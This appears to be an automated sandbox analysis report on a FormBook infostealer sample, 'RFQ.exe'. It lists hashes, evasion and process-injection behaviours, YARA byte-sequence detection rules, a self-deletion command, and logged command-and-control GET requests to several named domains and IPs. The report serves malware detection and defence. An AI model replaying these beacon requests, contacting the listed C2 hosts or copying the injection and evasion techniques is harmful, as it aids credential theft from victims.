
Analysis Report RFQ.exe

Overview

General Information

Sample Name: RFQ.exe
Analysis ID: 299614
MD5: 3378417b0ce72de02f6d20add03024e4
SHA1: 23e5e71afa92c5ff75e5dc899ecc756f841b8342
SHA256: 8f5161a12c4c8522e00196b39b3ee82c620da9914f8b861d6eee31cb8662d18b
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • RFQ.exe (PID: 6524 cmdline: 'C:\Users\user\Desktop\RFQ.exe' MD5: 3378417B0CE72DE02F6D20ADD03024E4)
    • RFQ.exe (PID: 6692 cmdline: {path} MD5: 3378417B0CE72DE02F6D20ADD03024E4)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 5920 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 4564 cmdline: /c del 'C:\Users\user\Desktop\RFQ.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.238898971.000000000390C000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.238898971.000000000390C000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x930f0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9335a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0xbf910:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0xbfb7a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9ee7d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0xcb69d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x9e969:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0xcb189:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x9ef7f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0xcb79f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x9f0f7:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xcb917:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93d72:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0xc0592:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x9dbe4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xca404:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x94a6b:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0xc128b:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0xa4b1f:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xd133f:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xa5b22:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.238898971.000000000390C000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0xa1c01:$sqlite3step: 68 34 1C 7B E1
  • 0xa1d14:$sqlite3step: 68 34 1C 7B E1
  • 0xce421:$sqlite3step: 68 34 1C 7B E1
  • 0xce534:$sqlite3step: 68 34 1C 7B E1
  • 0xa1c30:$sqlite3text: 68 38 2A 90 C5
  • 0xa1d55:$sqlite3text: 68 38 2A 90 C5
  • 0xce450:$sqlite3text: 68 38 2A 90 C5
  • 0xce575:$sqlite3text: 68 38 2A 90 C5
  • 0xa1c43:$sqlite3blob: 68 53 D8 7F 8C
  • 0xa1d6b:$sqlite3blob: 68 53 D8 7F 8C
  • 0xce463:$sqlite3blob: 68 53 D8 7F 8C
  • 0xce58b:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.487639591.0000000002D20000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.487639591.0000000002D20000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.RFQ.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.RFQ.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.RFQ.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x175f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1770c:$sqlite3step: 68 34 1C 7B E1
  • 0x17628:$sqlite3text: 68 38 2A 90 C5
  • 0x1774d:$sqlite3text: 68 38 2A 90 C5
  • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
1.2.RFQ.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.RFQ.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: RFQ.exe | Virustotal: Detection: 39%
Source: RFQ.exe | ReversingLabs: Detection: 52%
Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.238898971.000000000390C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.487639591.0000000002D20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.272791500.00000000014B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.486767546.0000000000BE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.272273185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.272819143.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: RFQ.exe | Joe Sandbox ML: detected
Source: 1.2.RFQ.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 4x nop then pop edi | 1_2_0040E417
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 4x nop then pop edi | 1_2_00417D67
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4x nop then pop edi | 6_2_02D2E417
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4x nop then pop edi | 6_2_02D37D67

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49758
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49759
Source: global traffic | HTTP traffic detected: GET /nl8/?U2Mxo=NjbdFdNXbTB4lJh0&uVg8=avnYvnpnkxtYXaIAR4Sou8XebpuM8ZPguIFoIYSggFPmc0ZkmARVxbtEvojTkK4BJiWC HTTP/1.1 | Host: www.coraldetectionsystem.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /nl8/?U2Mxo=NjbdFdNXbTB4lJh0&uVg8=PV6EDVNabin3NIVY5sUI0Pllu5c6yNLvkx9kNMhStM/z3GoJuybC/uVWyMg9/hl+Uhg9 HTTP/1.1 | Host: www.extremecouponing.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /nl8/?uVg8=b5d7zoT3NXDO9B+aMaag/yv2EEPdk6AXDS+7RXKAWurK5qZTM+upVYOsqeSxSkAcBcVP&U2Mxo=NjbdFdNXbTB4lJh0 HTTP/1.1 | Host: www.athomecovidcare.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 34.102.136.180 34.102.136.180
Source: Joe Sandbox View | IP Address: 199.34.228.77 199.34.228.77
Source: Joe Sandbox View | ASN Name: GOOGLEUS GOOGLEUS
Source: Joe Sandbox View | ASN Name: WEEBLYUS WEEBLYUS
Source: unknown | DNS traffic detected: queries for: www.coraldetectionsystem.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 17 Oct 2020 07:10:12 GMTServer: ApacheSet-Cookie: is_mobile=0; path=/; domain=www.coraldetectionsystem.comVary: X-W-SSL,User-AgentSet-Cookie: language=en; expires=Sat, 31-Oct-2020 07:10:12 GMT; Max-Age=1209600; path=/Set-Cookie: gdpr-kb=1; expires=Tue, 15-Oct-2030 07:10:12 GMT; Max-Age=315360000; path=/Cache-Control: privateX-Host: pages5.sf2p.intern.weebly.netX-UA-Compatible: IE=edge,chrome=1Content-Length: 3803Content-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 67 64 70 72 2f 67 64 70 72 73 63 72 69 70 74 2e 6a 73 3f 62 75 69 6c 64 54 69 6d 65 3d 31 36 30 32 38 36 39 39 33 32 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 
69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 63 64 6e 31 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 64 65 76 65 6c 6f 70 65 72 2f 6e 6f 6e 65 2e 69 63 6f 22 20 2f 3e 0a 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 50 72 6f 78 69 6d 61 20 4e 6f 76 61 27 3b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 22 29 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 Da
Source: explorer.exe, 00000002.00000000.256204691.00000000089F8000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.238898971.000000000390C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.487639591.0000000002D20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.272791500.00000000014B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.486767546.0000000000BE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.272273185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.272819143.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.238898971.000000000390C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.238898971.000000000390C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.487639591.0000000002D20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.487639591.0000000002D20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.272791500.00000000014B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.272791500.00000000014B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.486767546.0000000000BE0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.486767546.0000000000BE0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.272273185.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.272273185.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.272819143.00000000014E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.272819143.00000000014E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00419D50 NtCreateFile, | 1_2_00419D50
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00419E00 NtReadFile, | 1_2_00419E00
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00419E80 NtClose, | 1_2_00419E80
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00419F30 NtAllocateVirtualMemory, | 1_2_00419F30
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00419DA2 NtCreateFile, | 1_2_00419DA2
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00419E4B NtReadFile, | 1_2_00419E4B
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00419F2A NtAllocateVirtualMemory, | 1_2_00419F2A
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF95D0 NtClose,LdrInitializeThunk, | 6_2_04DF95D0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF9540 NtReadFile,LdrInitializeThunk, | 6_2_04DF9540
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF96D0 NtCreateKey,LdrInitializeThunk, | 6_2_04DF96D0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF96E0 NtFreeVirtualMemory,LdrInitializeThunk, | 6_2_04DF96E0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF9650 NtQueryValueKey,LdrInitializeThunk, | 6_2_04DF9650
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF9660 NtAllocateVirtualMemory,LdrInitializeThunk, | 6_2_04DF9660
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF9FE0 NtCreateMutant,LdrInitializeThunk, | 6_2_04DF9FE0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF9780 NtMapViewOfSection,LdrInitializeThunk, | 6_2_04DF9780
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF9710 NtQueryInformationToken,LdrInitializeThunk, | 6_2_04DF9710
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF9840 NtDelayExecution,LdrInitializeThunk, | 6_2_04DF9840
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF9860 NtQuerySystemInformation,LdrInitializeThunk, | 6_2_04DF9860
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF99A0 NtCreateSection,LdrInitializeThunk, | 6_2_04DF99A0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF9910 NtAdjustPrivilegesToken,LdrInitializeThunk, | 6_2_04DF9910
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF9A50 NtCreateFile,LdrInitializeThunk, | 6_2_04DF9A50
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF95F0 NtQueryInformationFile, | 6_2_04DF95F0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF9560 NtWriteFile, | 6_2_04DF9560
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DFAD30 NtSetContextThread, | 6_2_04DFAD30
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF9520 NtWaitForSingleObject, | 6_2_04DF9520
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF9670 NtQueryInformationProcess, | 6_2_04DF9670
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF9610 NtEnumerateValueKey, | 6_2_04DF9610
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF97A0 NtUnmapViewOfSection, | 6_2_04DF97A0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DFA770 NtOpenThread, | 6_2_04DFA770
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF9770 NtSetInformationFile, | 6_2_04DF9770
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF9760 NtOpenProcess, | 6_2_04DF9760
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DFA710 NtOpenProcessToken, | 6_2_04DFA710
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF9730 NtQueryVirtualMemory, | 6_2_04DF9730
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF98F0 NtReadVirtualMemory, | 6_2_04DF98F0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF98A0 NtWriteVirtualMemory, | 6_2_04DF98A0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DFB040 NtSuspendThread, | 6_2_04DFB040
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04DF9820 NtEnumerateKey, | 6_2_04DF9820
